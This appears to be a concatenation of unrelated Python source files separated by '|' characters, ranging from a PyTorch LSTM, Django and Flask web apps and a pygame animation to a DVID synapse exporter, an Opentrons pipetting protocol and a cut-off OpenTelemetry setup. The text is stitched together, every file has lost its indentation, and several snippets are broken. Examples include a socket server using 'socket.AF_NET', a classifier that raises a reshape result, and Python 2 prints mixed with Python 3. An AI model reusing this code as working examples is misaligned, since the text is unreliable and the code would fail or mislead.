nn.Linear(opt.hidden_size, opt.linear_hidden_size),
nn.ReLU(),
nn.Dropout(0.25),
nn.Linear(opt.linear_hidden_size, opt.num_classes),
# nn.Softmax()
)
if opt.embedding_path:
self.embedding.weight.data.copy_(torch.from_numpy(np.load(opt.embedding_path)))
# # self.embedding.weight.requires_grad = False
def forward(self, x):
x = self.embedding(x)
print x
lstm_out, _ = self.lstm(x)
# print lstm_out
# print lstm_out
out = self.linears(lstm_out[:, -1, :])
# out = self.linears(x)
return out
|
from django.http import HttpResponse
from django.shortcuts import render
import datetime
# Create your views here.
def date_time_view(request, retun=None):
date=datetime.datetime.now()
s='<h1> The current Data And Time at server is :' +str(date)+'</h1>'
return HttpResponse(s) |
import pygame
from math import sin, cos
from random import randint
SCREEN_WIDTH, SCREEN_HEIGHT = 650, 650
FPS = 850
BACKGROUND = [ 0 ] * 3
# --- Core ---------------------------------------------------------
class FuncDrawer:
def __init__(self, x_func, y_func, t_begin, t_end, t_step=0.1, tail=100):
self._x_func = x_func
self._y_func = y_func
self._t_begin = t_begin
self._t_end = t_end
self._t_step = t_step
self._tail = tail
self._points = [ ]
self._current_t = self._t_begin
self._prepare()
def _prepare(self):
x_max, y_max = x_min, y_min = self._calc(self._t_begin)
t = self._t_begin + self._t_step
while t <= self._t_end:
curr_x, curr_y = self._calc(t)
if curr_x < x_min:
x_min = curr_x
if curr_x > x_max:
x_max = curr_x
if curr_y < y_min:
y_min = curr_y
if curr_y > y_max:
y_max = curr_y
t += self._t_step
self._x_min = x_min
self._y_min = y_min
self._x_max = x_max
self._y_max = y_max
def _calc(self, t):
return self._x_func(t), self._y_func(t)
def _draw(self, screen, t, color, size):
width, height = screen.get_size()
x_zoom = width / (self._x_max - self._x_min)
y_zoom = height / (self._y_max - self._y_min)
zoom = min(x_zoom, y_zoom)
x = int((self._x_func(t) - self._x_min) * zoom)
y = int((self._y_func(t) - self._y_min) * zoom)
pygame.draw.circle(screen, color, (x, y), size)
return [ x, y ]
def draw_next(self, screen, color, size):
self._points.append(self._draw(screen, self._current_t, color, size))
if len(self._points) > self._tail:
pygame.draw.circle(animation_screen, BACKGROUND, self._points[0], size)
del self._points[0]
self._current_t += self._t_step
def get_rand_color():
return ( randint(1, 255), randint(1, 255), randint(1, 255) )
def sign(t):
return 1 if t > 0 else (-1 if t < 0 else 0)
# --- Main program -------------------------------------------------
def f1(t):
return 8*cos(t/10 + 1)*cos(0.5*t - 15)
def f2(t):
return 8*cos(1.1*t + 1)*cos(t / 2)*sin(t/100 + 15)
pygame.init()
animation_screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
animation_screen.set_alpha(255)
size = 2
t_step = 0.01
t_begin = 0
t_end = 1e4
# fd3 = FuncDrawer(lambda t: sin(t) ** 1, lambda t: cos(t) ** 1, 0, 3.15 * 2, 750)
fd1 = FuncDrawer(f1, f2, t_begin, t_end, t_step, 850)
fd2 = FuncDrawer(f2, f1, t_begin, t_end, t_step, 850)
fd3 = FuncDrawer(lambda t: abs(cos(t)) ** 0.5 * sign(cos(t)), lambda t: abs(sin(t)) ** 0.5 * sign(sin(t)), 0, 7, t_step / 4, 630)
points = [ ]
t = t_begin
done = False
while not done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
fd1.draw_next(animation_screen, (255, 0, 0), size)
fd2.draw_next(animation_screen, (0, 255, 0), size)
fd3.draw_next(animation_screen, (0, 0, 255), size)
pygame.display.flip()
pygame.time.wait(1000 // FPS)
pygame.quit() |
#!/usr/bin/python
# ADB.py
#
# Functions to manage an AWARE database dictionary
#
# This file is used to merge a heirarchy of json files used to track AWARE
# Imaging System.
#
# Developed by: Steve Feller on 11/8/2012
# Release Date:
# versions: 0.1
#
# Functions:
# generate(path) - function to generate a dictionary of
# the json data using the given path as
# the root.
# writeDict(dest) - function to write the current dictionary
# to the specified file
# query(key) - function to get a list of all values for the given key
# findKeys(value) - function to find a key that matches a given value
#
# genDict(path) - recursive function that step through
# subdirectories of the given path and
# aggregates data into a single dictionary
# that is returned.
# findKeys - recursive function to find keys for a given value
# stringList(dbase) - iterative generate a list of strings for each value
# for each value in a dictionary.
#
# Proposed functions:
# writeDB - exports current dictionary to the the JSON file heirarchy
#
# Notes:
# - need to add wildcard support to lookup functions (query, findkeys)
############################################################
import os
import argparse
import json
import datetime
#custom files
import AJSON
#import Adict
############################################################
# Global variables
############################################################
VERBOSE = 0 #Debug level
############################################################
# stringList( dbase)
#
# Function to generate a list of strings that show all fields
# in a database.
############################################################
def stringList(dbase):
files=list()
#iterate through all keys
for k, v in dbase.iteritems():
#iterate query through all keys
if type(v) is dict:
for f in stringList(v):
files.append(k+"/"+f)
else:
files.append(str(k)+":"+v)
return files
############################################################
# genKeys
#
# Function that recursively walks through dictionary and
# returns keys the given value
#
# Inputs:
# dbase - database to query (local to function to be iterative)
# val - value to query on
#
# Returns:
# result - dictionary of all subsequent instances of value
############################################################
def findKeys(dbase, val):
global VERBOSE
result={}
#For each dictionary element, see if it has children
for k, v in dbase.iteritems():
if VERBOSE > 1:
print("ADB.findKeys: Key: ",k," Value:",v)
#iterate query through all keys
if type(v) is dict:
value=findKeys(v, val)
if len(value) > 0:
#print "Result1:",k," value:",v
result[k]=value
if v == val:
#print "Result:",k," value:",v
result[k]=v
if VERBOSE > 1:
print("ADB.findKeys:result: ",result ," found", v," key:",k)
return result
############################################################
# query
#
# Function that recursively walks through dictionary and
# returns sub values that contain the given key
#
# Inputs:
# ldbase - database to query (local to function to be iterative)
# key - key to query on
#
# Returns:
# result - dictionary of all subsequent instances of value
#
# Notes: Eventually should include wildcards lookup options
#
############################################################
def query(dbase, key):
global VERBOSE
result={}
#For each dictionary element, see if it has children
for k, v in dbase.iteritems():
if VERBOSE > 1:
print("ADB.query: key: ",k," Value:",v)
#iterate query through all keys
if type(v) is dict:
value=query(v, key)
if len(value) > 0:
#print "Result1:",k," value:",v
result[k]=value
if k == key:
#print "Result:",k," value:",v
result[k]=v
if VERBOSE > 1:
print("ADB.query:result: ",result ," found", k," Value:",v)
return result
############################################################
# generate
#
# External call to generate a dictionary from the specified
# root level path. Adds date/time header information to
# toplevel of dictionary
#
# Inputs:
# path - base directory to generate database from
#
# Returns:
# dbase - resulting database
############################################################
def generate(path):
dbase = {}
global VERBOSE
#get current time
dt = datetime.datetime.now()
#generate unique ID from timestamp (onl
dbase["id"] = dt.strftime("%Y%m%d%H%m%S")+str(dt.microsecond)
#set date and time par
dbase["date"]=dt.strftime("%Y-%m-%d")
dbase["time"]=dt.strftime("%H:%m.%S")
#check if valid path (need more debugging)
if path[-1] == '/':
dirname=os.path.basename(path[:-1])
else:
dirname=os.path.basename(path)
ret = genDict(dbase, path)
if ret["rc"] == 1:
dbase[dirname]=ret["data"]
if VERBOSE > 1:
print("ADB.generate dbase:",dbase)
return dbase
############################################################
# genDict
#
# Function that recursively generates a single dictionary from
# JSON files starting at the specified root level. This allows
# the creation of dictionaries that reference a subset of the
# database
#
# Inputs:
# path - directory path to start generating data
#
# Returns (dictionary):
# "rc" - return code
# 1 = success
# 0 = directoy does not have json file
# "data" - dictionary of data from current and sub directories
############################################################
def genDict(dbase, path):
#check if valid path (need more debugging)
if path[-1] == '/':
dirname=os.path.basename(path[:-1])
else:
dirname=os.path.basename(path)
path=path+'/'
#generate name of local json file
jname=path+dirname+'.json'
if VERBOSE > 1:
print("Jname:",jname)
#Create dictionary with local data
#if reads correctly (rc=1) add json info to current dictionary. If not,
#stop iterative process
retval = AJSON.readJson(jname)
if VERBOSE > 1:
print("Name:",jname," =>",retval)
if retval["rc"] == 1:
node = retval["data"]
else:
return {"rc":"0","data":{}}
#Walk through subdirectories and recursively pull dictionaries from their content
#get list of subdirs
pathList = os.walk(path).next()[1]
if VERBOSE > 1:
print("Pathlist: ",pathList)
#recurse through each to get a list of children
for child in pathList:
#generate pathname for child and do recursive call
cpath = path+child
cpath.strip()
if VERBOSE > 1:
print("ChildPath: ",cpath)
#recursively call this function
db = genDict(dbase, cpath)
node[child]=db["data"]
return {"rc":1,"data":node}
############################################################
# writeDict
#
# Function to write out the dictionary to a specified file.
#
# Inputs:
# path - directory path to start generating data
#
# Returns (dictionary):
# "rc" - return code matches AJSON.writeJson
############################################################
def writeDict(dbase, dest):
rc = AJSON.writeJson(dest, dbase, True)
return rc
def main():
global VERBOSE
#parse inputs
# parse command line arguments
parser = argparse.ArgumentParser(description='AWARE Database Script')
parser.add_argument('-v', action='store_const', dest='VERBOSE', const='True', help='VERBOSE output')
parser.add_argument('-vv', action='store_const', dest='VERBOSE2', const='True', help='VERBOSE output')
parser.add_argument('-q', action='store', dest='query', help='find values for specified key')
parser.add_argument('-k', action='store', dest='qval', help='find keys for specified value')
parser.add_argument('-p', action='store_const', dest='printout', const='True', help='print contents of JSON file')
# parser.add_argument('-no-force', action='store_const', dest='noforce', const='True', help='force write JSON file')
parser.add_argument('-w', action='store_const', dest='write', const='True', help='write JSON file')
parser.add_argument('-o', action='store', dest='outfile', help='output file')
parser.add_argument('filename', nargs='+', help='filename')
args=parser.parse_args()
#set filename
if args.VERBOSE:
VERBOSE=1
if args.VERBOSE2:
VERBOSE=2
dbase = generate(args.filename[0])
if args.printout:
print(json.dumps(dbase, indent=4, sort_keys=True))
#If query, let's look
if args.query:
print("Query: ",args.query)
res = query(dbase, args.query)
AJSON.printJson(res)
#If value query, let's look
if args.qval:
print("findKeys: ",args.qval)
res = findKeys(dbase, args.qval)
# printJson(res)
fileList=stringList(res)
print("Itemlist:")
for item in fileList:
print(item)
#write output if requested
if args.outfile:
writeDict(dbase, args.outfile)
if VERBOSE > 1:
print("Complete!")
#Function to validate peformance
if __name__ == '__main__':
main() |
from __future__ import absolute_import
from agms.agms import Agms
from agms.request.invoicing_request import InvoicingRequest
from agms.response.invoicing_response import InvoicingResponse
from agms.exception.invalid_request_exception import InvalidRequestException
class Invoicing(Agms):
"""
A class representing AGMS Invoice objects.
"""
def __init__(self):
self.op = None
self._api_url = 'https://gateway.agms.com/roxapi/AGMS_BillPay.asmx'
self._requestObject = InvoicingRequest
self._responseObject = InvoicingResponse
def customer(self, params):
self.op = 'RetrieveCustomerIDList'
self._reset_parameters()
for param, config in params:
self._set_parameter(param, config)
self._execute()
return self.response.to_array()
def invoice(self, params):
self.op = 'RetrieveInvoices'
self._reset_parameters()
for param, config in params:
self._set_parameter(param, config)
self._execute()
return self.response.to_array()
def submit(self, params):
self.op = 'SubmitInvoice'
self._reset_parameters()
for param, config in params:
self._set_parameter(param, config)
self._execute()
return self.response.to_array()
def _execute(self):
if self.op == 'RetrieveCustomerIDList':
self._do_connect('RetrieveCustomerIDList', 'RetrieveCustomerIDListResponse')
elif self.op == 'RetrieveInvoices':
self._do_connect('RetrieveInvoices', 'RetrieveInvoicesResponse')
elif self.op == 'SubmitInvoice':
self._do_connect('SubmitInvoice', 'SubmitInvoiceResponse')
else:
raise InvalidRequestException('Invalid request to Invoicing API ' + self.op) |
import socket
serversocket = socket.socket(socket.AF_NET, socket.SOCK_STREAM)
host = socket.gethostbyname()
port = 444
serversocket.bind(("192.168.1.104", port))
serversocket.listen(3)
while True:
clientsocket, address = serversocket.accept()
print("received connection from %s " % str(address))
message = "thank you for connecting to the server" + "\r\n"
clientsocket.send(message.encode("ascii"))
clientsocket.close()
|
import warnings
warnings.filterwarnings('ignore')
from datasetup.utils import *
from datasetup.data_preprocessing import filterPAR, getPoints
from datasetup.data_segmentation import *
data_file = 'exported/Cleaned_Dataset.csv'
""" User Input Declaration:
1. filter_mode = 0 (Don't filter); 1 (Filter TC that passed through PAR)
2. point_mode = 0 (ORIGIN); 1 (ENDPOINT)
3. clustering_mode = 0 (kMeans); 1 (Hierarchical Clustering); 2 (DBSCAN)
"""
# filter_mode = input('Filter dataset? \n 0 NO \n 1 YES\n')
# point_mode = input('What data point to use? \n 0 ORIGIN \n 1 ENDPOINT \n')
# clustering_mode = input('What clustering method to use? \n 0 kMeans \n 1 Hierarchical Clustering \n 2 DBSCAN \n')
checkFileType(data_file)
data = openFile(data_file)
data2 = data
for i in range(2):
if i == 1:
PAR_data = filterPAR(data)
PAR_ORIGIN = getPoints(PAR_data, 'ORIGIN')
silhouetteAnalysis(PAR_ORIGIN, "PAR-FILTERED_ORIGIN.png", "FILTERED")
else:
NON_data = data
NON_ORIGIN = getPoints(NON_data, 'ORIGIN')
silhouetteAnalysis(NON_ORIGIN, "NON-FILTERED_ORIGIN.png", "NON-FILTERED")
|
#!/bin/env
"""
Script that generates body_synapse file using specified annotation datatype with synapes.
lau, 01/16 first version of script
example:
python generate_body_synapses_dvid.py emdata1:8500 44d42 bodies3_annotations mb6_synapses annotations body_synapses_test
"""
# ------------------------- imports -------------------------
import json
import sys
import os
import socket
import datetime
import random
from libdvid import DVIDNodeService, ConnectionMethod
# ------------------------ function to load/post body_synapse to DVID -------------
def load_body_synpase_dvid (body_synapses, keyvalue_name, key_name, node_service):
data = str(json.dumps(body_synapses))
node_service.put(keyvalue_name, key_name, data)
print "Done posting"
#
# dvid_request_url = "http://" + dvid_server + "/api/node/" + dvid_uuid + "/" + keyvalue_name + "/key/" + key_name
#
# res = requests.post(url=dvid_request_url,data=data)
# os.remove(body_synapse_json)
# ------------------------- script start -------------------------
if __name__ == '__main__':
if len(sys.argv) < 6:
print "usage: dvid_server dvid_node_uuid body_annotations_name(keyvalue) annotations_synapses(annotations) annotations_keyvalue(keyvalue) body_synapses_key(key)"
print "ex: python ./generate_body_synapses_dvid.py emdata1:8500 44d42 bodies3_annotations mb6_synapses annotations body_synapses_test"
sys.exit(1)
dvid_server = sys.argv[1]
dvid_uuid = sys.argv[2]
body_annotations_name = sys.argv[3]
annotations_synapses = sys.argv[4]
annotations_keyvalue = sys.argv[5]
body_synapses_key = sys.argv[6]
# Libdvid has problems with trailing slashes in urls
if dvid_server.endswith('/'):
dvid_server = dvid_server[0:-1]
http_dvid_server = "http://{0}".format(dvid_server)
node_service = DVIDNodeService(dvid_server, dvid_uuid, 'umayaml@janelia.hhmi.org', 'generate body synapses')
response = node_service.get_keys(body_annotations_name)
# proxies = {'http': 'http://' + dvid_server + '/'}
# dvid_get_annotated_bodies = "http://" + dvid_server + "/api/node/" + dvid_uuid + "/" + body_annotations_name + "/keys"
# print "dvid_url " + dvid_get_annotated_bodies
# response = urllib.urlopen(dvid_get_annotated_bodies, proxies=proxies).read()
bodies_annot_data = list(response)
group_synapses = []
body_theshold = 0
for key in bodies_annot_data:
if key.isdigit():
#print "key " + key
# key is a bodyID
# get synapses for bodyID like this http://emdata1.int.janelia.org:8500/api/node/44d42/mb6_synapses/label/10095139
get_synapses_dvid = annotations_synapses + "/label/" + key
response_syn = node_service.custom_request( get_synapses_dvid, "", ConnectionMethod.GET )
# get_synapses_dvid = "http://" + dvid_server + "/api/node/" + dvid_uuid + "/" + annotations_synapses + "/label/" + key
# print "get syn: " + get_synapses_dvid
# response_syn = urllib.urlopen(get_synapses_dvid, proxies=proxies).read()
if response_syn == 'null':
print "No synapse data found for bodyID: " + key
else:
print "Found synapse data for bodyID: " + key
body_synapses = {}
#get_body_annot = "http://" + dvid_server + "/api/node/" + dvid_uuid + "/" + body_annotations_name + "/key/"+ key
#response_bod_annot = urllib.urlopen(get_body_annot, proxies=proxies).read()
#body_annot_data = json.loads(response_bod_annot)
#print body_annot_data
synapse_data = json.loads(response_syn)
body_theshold += 1
syn_count = 0
psd_count = 0
tbar_count = 0
all_locations = {}
z_locs = []
for synapse in synapse_data:
syn_count += 1
syn_kind = synapse['Kind']
if syn_kind == 'PreSyn':
tbar_count += 1
if syn_kind == 'PostSyn':
psd_count += 1
syn_pos = synapse['Pos']
syn_z = syn_pos[2]
all_locations[syn_z] = syn_pos
z_locs.append(syn_z)
z_locs.sort()
loc_num = len(z_locs);
mid = int(loc_num/2)
if mid != 0:
z_key = z_locs[mid]
#print "Here " + key + " " + str(syn_count) + " " + str(tbar_count) + " " + str(psd_count) + " locnum " + str(loc_num) + " mid " + str(mid) + " zkey " + str(z_key)
this_loc = all_locations[z_key]
export_synapse_data = {}
export_synapse_data["body ID"] = int(key)
export_synapse_data["body synapses"] = syn_count
export_synapse_data["body PSDs"] = psd_count
export_synapse_data["body T-bars"] = tbar_count
export_synapse_data["location"] = this_loc
text_val = "orphan-link assignment. " + str(syn_count) + " Synapses, " + str(tbar_count) + " T-bars, " + str(psd_count) + " PSDs"
export_synapse_data["text"] = text_val
export_synapse_data["body threshold"] = body_theshold
group_synapses.append(export_synapse_data)
print "Done going through bodyIDs"
syn_body_metadata = {}
syn_body_metadata['username'] = "flyem"
syn_body_metadata['description'] = "bookmarks"
syn_body_metadata['coordinate system'] = "dvid"
syn_body_metadata['software'] = "generate_body_synapses_dvid.py"
syn_body_metadata['software version'] = "1.0.0"
syn_body_metadata['file version'] = 1
syn_body_metadata['session path'] = os.getcwd()
syn_body_metadata['computer'] = socket.gethostname()
syn_body_metadata['date'] = datetime.datetime.now().strftime("%d-%B-%Y %H:%M")
final_json_export = {}
final_json_export['data'] = group_synapses
final_json_export['metadata'] = syn_body_metadata
load_body_synpase_dvid (final_json_export, annotations_keyvalue, body_synapses_key, node_service)
sys.exit(1)
|
import os
import json
from datetime import datetime
from random import shuffle
from flask import Flask, session, redirect, url_for, request, render_template, jsonify
# Custom .py
import helper.helper as helper
import riddles.riddle as riddle
app = Flask(__name__)
app.config['SECRET_KEY'] = os.environ.get("SECRET_KEY")
@app.route('/')
def index():
app_data = helper.read_json('data/system/app_data.json')
app_data = app_data['1.4'][0]["members"]
# Render index.html by default
return render_template("index.html", members=app_data, page_title="Riddle Game")
""" Create profile """
@app.route('/<user_name>/create_profile', methods=["POST"])
def create_profile(user_name):
return helper.create_profile_data(user_name)
""" Log in """
@app.route('/<user_name>/log_in', methods=["GET"])
def log_in(user_name):
profiles = helper.read_txt("data/profiles/all-profiles.txt")
profile = user_name.lower() + "\n"
if profile in profiles:
session['user'] = {'user_name': user_name}
return jsonify(helper.read_json(f"data/profiles/{user_name}/{user_name}.json"))
else:
return jsonify("no profile")
""" Log out """
@app.route('/logout')
def logout():
session.pop('user')
return redirect(url_for('index'))
""" Riddles Game Setting """
@app.route('/<user_name>/riddle-g-setting')
def riddle_setting(user_name):
if 'user' in session:
if user_name == session['user']['user_name']:
riddle_profiles = helper.read_txt(
f"data/profiles/{user_name}/riddle_game/riddle_profiles.txt")
else:
return redirect(url_for('index'))
else:
return redirect(url_for('index'))
return render_template("riddle-g-setting.html",
user_name=user_name, riddle_profiles=riddle_profiles, page_title="Riddle Game Setting")
# JSON requests to create save
@app.route('/postjson/<user_name>/riddle-g-setting', methods=["POST"])
def parse_setting(user_name):
data = request.get_json(force=True)
profiles = helper.read_txt(
f"data/profiles/{user_name}/riddle_game/riddle_profiles.txt")
profile = data["riddle_game_data"]["riddle_profile_name"] + "\n"
finished_games = helper.read_txt(
f"data/profiles/{user_name}/riddle_game/finished_riddles.txt")
if profile in profiles or profile in finished_games:
return jsonify(profile)
# Create new game
riddle.create_riddle_game(data)
return jsonify(data)
""" Riddles Game """
@app.route('/<user_name>/<riddle_profile>/riddle-game', methods=["GET"])
def get_results(user_name, riddle_profile):
if 'user' in session:
if user_name == session['user']['user_name']:
riddle_profiles = helper.read_txt(
f"data/profiles/{user_name}/riddle_game/riddle_profiles.txt")
profile = helper.read_json(
helper.profile(user_name, riddle_profile))
profile = profile["game"][0]
if profile["mods"] == "limited":
return render_template("riddle-game.html",
user_name=user_name,
riddle_profiles=riddle_profiles,
riddle_profile=riddle_profile,
tries=int(profile["tries"]),
page_title="Riddle Game")
else:
# Render riddle-game template by default
return render_template("riddle-game.html",
user_name=user_name,
riddle_profiles=riddle_profiles,
riddle_profile=riddle_profile,
tries=int(0),
page_title="Riddle Game")
return redirect(url_for('index'))
# JSON POST to play the game
@app.route('/postjson/<user_name>/<riddle_profile>/riddle-game', methods=["POST", "GET"])
def parse_answer(user_name, riddle_profile):
# Main POST request for riddle-game
if request.method == "POST":
post_data = request.get_json(force=True)
if post_data["id"] == "answer":
data = riddle.riddle_game(user_name, riddle_profile, post_data)
return jsonify(data)
elif post_data["id"] == "skip_question":
data = riddle.skip_question(user_name, riddle_profile)
return jsonify(data)
else:
data = riddle.delete_question(user_name, riddle_profile)
return jsonify(data)
data = helper.read_json(helper.profile(user_name, riddle_profile))
return jsonify(data)
# Statistics for Ridddle game
@app.route('/<user_name>/statistics', methods=["GET"])
def show_statistics(user_name):
if 'user' in session:
if user_name == session['user']['user_name']:
user_profile = helper.read_json(
f"data/profiles/{user_name}/{user_name}.json")
finished_games = user_profile[f"{user_name}"][0]["finished_riddles"]
riddle_profiles = helper.read_txt(
f"data/profiles/{user_name}/riddle_game/riddle_profiles.txt")
statistics = helper.read_json("data/riddle-game/statistics.json")
statistics = sorted(statistics['profiles'],
key=lambda k: k['right_answers'], reverse=True)
return render_template("statistics.html",
finished_games=finished_games,
riddle_profiles=riddle_profiles,
user_name=user_name,
statistics=statistics[:10],
page_title="Statistics")
return redirect(url_for('index'))
""" Errors """
# 404
@app.errorhandler(404)
def page_not_found(e):
helper.write_to_txt("data/system/error-log.txt", "a", f"{e}" + '\n')
return render_template('404.html'), 404
# 500
@app.errorhandler(500)
def internal_server_error(e):
helper.write_to_txt("data/system/error-log.txt", "a", f"{e}" + '\n')
return render_template('500.html'), 500
""" App data """
@app.route('/app_data')
def get_app_data():
app_data = helper.read_json('data/app_data.json')
return jsonify(app_data)
if __name__ == '__main__':
app.run(host=os.getenv('IP'),
port=os.getenv('PORT'),
debug=os.environ.get("DEVELOPMENT"))
|
from general.utils import MyTask
import numpy as np
class Classifier(MyTask):
def createmodel(self, inputsize, outputsize, update_model=False):
tmpsample=np.array([np.zeros(inputsize)])
newshape=self._reshape(tmpsample).shape[1:]
return self._createmodel(newshape, outputsize,update_model=update_model)
def train(self, trainset, trainlabel):
return self._train(self._reshape(trainset), trainlabel)
def evaluate(self, testset, testlabel):
return self._evaluate(self._reshape(testset), testlabel)
def predict(self, testset):
return self._predict(self._reshape(testset))
def predict_classes(self, testset):
return self._predict_classes(self._reshape(testset))
def setWeight(self,weight):
self.weight=weight
def _reshape(self, data):
if(len(data.shape) == 2):
return data
if(len(data.shape) == 1):
raise np.reshape(data, (data.shape[0], 1))
return np.reshape(data, (data.shape[0], data.shape[1]*data.shape[2]))
def _createmodel(self, inputsize, outputsize, update_model=False):
raise NotImplementedError
def _train(self, trainset, trainlabel):
raise NotImplementedError
def _evaluate(self, testset, testlabel):
raise NotImplementedError
def _predict(self, testset):
raise NotImplementedError
def _predict_classes(self, testset):
raise NotImplementedError
|
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 16 11:11:23 2020
@author: Administrator
"""
import os
path = r'C:\Users\Administrator\Desktop'
os.chdir(path)
name = 'rsrp_grid50'
with open('rsrp_grid_09.sql',encoding ='utf-8') as f:
content = f.readlines()
for i,line in enumerate(content):
if 'SET FOREIGN_KEY_CHECKS=0;' in line:
no = i+1
content.insert(no,'USE {};\n'.format(name))
content.insert(no,'CREATE DATABASE IF NOT EXISTS {};\n'.format(name))
content.insert(no,'DROP DATABASE IF EXISTS {};\n'.format(name))
with open('rsrp_grid_09_1.sql','w',encoding ='utf-8') as f:
for line in content:
f.writelines(line) |
from django.contrib import admin
from .models import Winery, Wine, Grape, County, Comment
# Register your models here.
admin.site.register(Winery)
admin.site.register(Wine)
admin.site.register(Grape)
admin.site.register(Comment) |
from opentrons import protocol_api
metadata = {'apiLevel': '2.2',
'protocolName': 'Clip Template v2',
'author': 'Gabrielle Johnston',
'description': 'DNABot updated clip template'}
def run(protocol: protocol_api.ProtocolContext):
def clip(
prefixes_wells,
prefixes_plates,
suffixes_wells,
suffixes_plates,
parts_wells,
parts_plates,
parts_vols,
water_vols,
tiprack_type='opentrons_96_tiprack_10ul',
p10_mount='right',
p10_type='p10_single',
well_plate_type='biorad_96_wellplate_200ul_pcr',
tube_rack_type='opentrons_24_tuberack_nest_1.5ml_snapcap'):
"""Implements linker ligation reactions using an opentrons OT-2."""
# Constants
INITIAL_TIP = 'A1'
CANDIDATE_TIPRACK_SLOTS = ['3', '6', '9']
PIPETTE_TYPE = p10_type
# PIPETTE_MOUNT = 'right'
PIPETTE_MOUNT = p10_mount
# SOURCE_PLATE_TYPE = 'biorad_96_wellplate_200ul_pcr'
SOURCE_PLATE_TYPE = well_plate_type
# DESTINATION_PLATE_TYPE = 'biorad_96_wellplate_200ul_pcr'
DESTINATION_PLATE_TYPE = well_plate_type
DESTINATION_PLATE_POSITION = '1'
# TUBE_RACK_TYPE = 'opentrons_24_tuberack_nest_1.5ml_snapcap'
TUBE_RACK_TYPE = tube_rack_type
TUBE_RACK_POSITION = '4'
MASTER_MIX_WELL = 'A1'
WATER_WELL = 'A2'
INITIAL_DESTINATION_WELL = 'A1'
MASTER_MIX_VOLUME = 20
LINKER_MIX_SETTINGS = (4, 10)
PART_MIX_SETTINGS = (4, 10)
# Tiprack slots
total_tips = 4 * len(parts_wells)
letter_dict = {'A': 0, 'B': 1, 'C': 2,
'D': 3, 'E': 4, 'F': 5, 'G': 6, 'H': 7}
initial_destination_well_index = letter_dict[INITIAL_DESTINATION_WELL[0]]*12 \
+ int(INITIAL_DESTINATION_WELL[1]) - 1
tiprack_1_tips = (
13 - int(INITIAL_TIP[1:])) * 8 - letter_dict[INITIAL_TIP[0]]
if total_tips > tiprack_1_tips:
tiprack_num = 1 + (total_tips - tiprack_1_tips) // 96 + \
(1 if (total_tips - tiprack_1_tips) % 96 > 0 else 0)
else:
tiprack_num = 1
slots = CANDIDATE_TIPRACK_SLOTS[:tiprack_num]
source_plates = {}
source_plates_keys = list(set((
prefixes_plates + suffixes_plates + parts_plates)))
for key in source_plates_keys:
source_plates[key] = protocol.load_labware(SOURCE_PLATE_TYPE, key)
tipracks = [protocol.load_labware(tiprack_type, slot)
for slot in slots]
if PIPETTE_TYPE != 'p10_single':
print('Define labware must be changed to use', PIPETTE_TYPE)
exit()
pipette = protocol.load_instrument('p10_single', PIPETTE_MOUNT,
tip_racks=tipracks)
pipette.flow_rate.aspirate = 20
#pipette.pick_up_tip(tipracks[0].well(INITIAL_TIP))
destination_plate = protocol.load_labware(
DESTINATION_PLATE_TYPE, DESTINATION_PLATE_POSITION)
tube_rack = protocol.load_labware(TUBE_RACK_TYPE, TUBE_RACK_POSITION)
master_mix = tube_rack.wells_by_name()[MASTER_MIX_WELL]
water = tube_rack.wells_by_name()[WATER_WELL]
#destination_wells = destination_plate.wells(
#INITIAL_DESTINATION_WELL, length=int(len(parts_wells)))
destination_wells = destination_plate.wells()[
initial_destination_well_index:(
initial_destination_well_index + int(len(parts_wells)))]
# Transfers
#pipette.pick_up_tip()
pipette.pick_up_tip(tipracks[0].well(INITIAL_TIP))
pipette.transfer(MASTER_MIX_VOLUME, master_mix,
destination_wells, new_tip='never', touch_tip=True,
blow_out=True)
pipette.drop_tip()
pipette.transfer(water_vols, water,
destination_wells, touch_tip=True,
new_tip='always')
for clip_num in range(len(parts_wells)):
prefix_wells = [prefix_well.bottom() for prefix_well in
source_plates[prefixes_plates[clip_num]].wells(
prefixes_wells[clip_num])]
for prefix_well in prefix_wells:
pipette.pick_up_tip()
pipette.move_to(prefix_well)
protocol.max_speeds['Z'] = 10
pipette.aspirate(1, prefix_well)
pipette.move_to(destination_wells[clip_num].top())
protocol.max_speeds['Z'] = None
pipette.dispense(1, destination_wells[clip_num])
pipette.touch_tip(destination_wells[clip_num])
pipette.mix(LINKER_MIX_SETTINGS[0], LINKER_MIX_SETTINGS[1],
destination_wells[clip_num])
pipette.drop_tip()
suffix_wells = [suffix_well.bottom() for suffix_well in
source_plates[suffixes_plates[clip_num]].wells(
suffixes_wells[clip_num])]
for suffix_well in suffix_wells:
pipette.pick_up_tip()
pipette.move_to(suffix_well)
protocol.max_speeds['Z'] = 10
pipette.aspirate(1, suffix_well)
pipette.move_to(destination_wells[clip_num].top())
protocol.max_speeds['Z'] = None
pipette.dispense(1, destination_wells[clip_num])
pipette.touch_tip(destination_wells[clip_num])
pipette.mix(LINKER_MIX_SETTINGS[0], LINKER_MIX_SETTINGS[1],
destination_wells[clip_num])
pipette.drop_tip()
part_wells = [part_well.bottom() for part_well in
source_plates[parts_plates[clip_num]].wells(
parts_wells[clip_num])]
for part_well in part_wells:
pipette.pick_up_tip()
pipette.move_to(part_well)
protocol.max_speeds['Z'] = 10
pipette.aspirate(parts_vols[clip_num], part_well)
pipette.move_to(destination_wells[clip_num].top())
protocol.max_speeds['Z'] = None
pipette.dispense(parts_vols[clip_num],
destination_wells[clip_num])
pipette.touch_tip(destination_wells[clip_num])
pipette.mix(PART_MIX_SETTINGS[0], PART_MIX_SETTINGS[1],
destination_wells[clip_num])
pipette.drop_tip()
clip(**clips_dict, p10_mount=p10_mount, p10_type=p10_type, well_plate_type=well_plate_type, tube_rack_type=tube_rack_type)
|
# Copyright 2021 Google
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from opentelemetry import trace
from opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchExportSpanProcessor
from opentelemetry.trace import Link
trace.set_tracer_provider(TracerProvider())
cloud_trace_exporter = CloudTraceSpanExporter()
trace.get_tracer_provider().add_span_processor(
# BatchExportSpanProcessor buffers spans and sends them in batches in a
# background thread.
